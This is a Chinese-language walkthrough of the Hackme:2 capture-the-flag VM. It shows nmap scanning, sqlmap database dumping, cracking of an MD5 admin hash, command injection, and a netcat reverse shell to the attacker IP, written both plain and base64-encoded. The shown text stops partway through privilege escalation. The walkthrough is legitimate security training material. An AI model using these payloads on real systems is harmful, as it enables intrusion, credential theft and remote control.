Hackme:2靶机渗透练习 – 作者:compactdisk

Hackme:2靶机渗透练习

网络结构:

环境搭建平台为VMware15,网络为nat模式,网段192.168.1.0/24

网络由攻击机kali、靶机组成

靶机ip:192.168.1.142

kali linux ip:192.168.1.137

信息收集:

主机发现:

nmap -sP 192.168.1.0/24

如下图,图中192.168.1.1为VMnet8网卡地址,1.3为网关地址,1.137为kali地址,因此判断目标靶机地址为192.168.1.142

image

端口服务扫描:

nmap -p 1-65535 -A 192.168.1.142 -sV -T4

目标主机开启了22端口ssh服务,以及80端口http服务

image

目录及页面爆破:

dirb爆破目录:

只得到了一个uploads目录

image

同时dirbuster使用其他字典一起爆破,看能不能得到更多结果:

image

也是并没有发现新目录

image

目录爆破并没有发现啥可疑的页面、目录,看来只能访问web页面,从网站本身找突破口了

漏洞挖掘:

直接访问dirbuster爆破出的任意目录,基本都会跳转到登录界面,那我们就先注册一个新用户,登录看看

image

登录之后是一个查询书籍的页面,看来这里是与数据库交互了

image

很自然的能够想到sql注入,sqlmap跑一下,需要先burp抓个包,拿一下cookie,而且是post传参,需要看下参数之类的信息,这里不再放图,直接到注入阶段

先看下数据库

sqlmap -u http://192.168.1.142/welcome.php --data "search=1" --dbs --cookie "PHPSESSID=ifl5ffohjq6m627b0qfgda94ke" --tamper space2comment.py --level 3 --risk 3

可以看到有一个webapphacking库

image

查一下里面的表

sqlmap -u http://192.168.1.142/welcome.php --data "search=Linux" --cookie "PHPSESSID=ifl5ffohjq6m627b0qfgda94ke"  --level=3 --risk=3 --tamper=space2comment --tables -D 'webapphacking'

在注入结果中可以看到,有一个user表和一个books表,很显然books表里应该就是我们刚刚可以查询的图书信息,users表不言而喻

image

不再挨个表查询,直接脱库

sqlmap -u http://192.168.1.142/welcome.php --data "search=Linux" --cookie "PHPSESSID=ifl5ffohjq6m627b0qfgda94ke"  --level=3 --risk=3 --tamper=space2comment --dump-all -D 'webapphacking'

可以看到users表里有一个superadmin用户

image

将密码2386acb2cf356944177746fc92523983,md5解密,得到明文Uncrackable

image

然后在登录页面,使用此账户名密码登录

image

登录之后可以看到一个图片上传和两个通过姓、名查询用户的查询框,上传功能在后端对后缀名进行了过滤,无法上传后缀名中带有php的文件,上传图片马后,之前我们使用dirb爆破目录时看到的那个uploads目录并不是上传文件的存放目录,怀疑是另外有地方存放,且我们此处图片马后缀名png,无法正常解析,此路不通

再看下面的查询输入框,用burp的intruder简单测试一下是否存在注入,选用了模糊-完整的payload

image

可以看到,这里‘id’参数的响应是200的,且返回来了用户信息,此处存在命令注入

image

使用ststem()函数测试,也是成功返回了我们想要的信息

image

制作反弹shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.137 4444 > /tmp/f

这里直接使用system函数包裹此命令注入的话会反弹失败,需要转base64编码

system(base64_decode('cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC

4xLjEzNyA0NDQ0ID4gL3RtcC9m'))
//这里因为freebuf检测c4居然是敏感词,不能连在一起,所以空出一行,实际使用时把中间那行去掉

kali监听4444端口

image

web页面点击search发送参数,反弹成功,拿到一个低权限的web shell

image

权限提升:

首先查看一下设置了suid的文件、命令

ls -lh $(find / -perm -u=s -type f 2>/dev/null)

可以看到这个touchmenot文件自己在/home目录下,格外的扎眼,而且子目录名为legacy,百度对这个词的解释为传统BIOS传输模式启动顺序:开机→BIOS初始化→BIOS自检→引导操作系统→进入系统

image

cd到这个目录下,运行此文件,长时间不响应

image

怀疑是shell的问题,这里先获取一个交互shell

python -c "import pty;pty.spawn('/bin/bash');"

来源:freebuf.com 2021-02-22 11:40:34 by: compactdisk

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论